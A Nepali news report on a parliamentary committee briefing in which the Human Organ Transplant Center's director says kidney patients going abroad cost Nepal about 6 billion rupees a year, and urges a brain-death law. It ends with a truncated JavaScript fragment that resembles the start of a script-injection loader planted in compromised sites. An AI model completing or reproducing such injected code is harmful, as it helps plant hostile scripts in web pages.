नेपालमा नै सस्तो र सुलभ उपचार हुदाहदै पनि मृगौला उपचारका लागी नेपालीहरु बिदेशमा जादा बर्षेनि ६ अर्व रुपैया बाहिरिएको छ। सिंहदरबारमा सोमबार बसेको महिला बालबालिका तथा समाजकल्याण समितिमा मानब अंग प्रत्यारोपण केन्द्रका कार्यकारी निर्देशक पुकार चन्द श्रेष्ठले उक्त जानकारी दिनुभएको हो।
मानब अंग प्रत्यारोपण केन्दबाट भएका कामकारवाही र भावी योजनाका बारे जानकारी गराउदै श्रेष्ठले नेपालमा नै सस्तो र सुलभ उपचार हुदाहदै पनि जानकारी नहुदा बिरामीहरु बिदेश धाउनुपरेको बताउनुभयो। उहाले नेपालमा डायलासिस गराउने ३० वटा केन्द्र रहेको भन्दै १५ बिरामीले नियमित डायलासिस गराईरहेको जानकारी दिनुभयो। उहाले मानब अंग प्रत्यारोपणका लागी नेपालमा ब्रेन डेथको कानुन ल्याउनुपर्नेमा जोड दिनुभयो। र्बैठकमा समिति सदस्यहरुले मानब अंग प्रत्यारोपणका बिषयमा जिज्ञासा राखेका थिए। नेपालमा मृगौलाको उपचार १९९९ मा बीर अस्पतालबाछ सुरु भएको हो।
var d=document;var s=d.createElement(‘script’);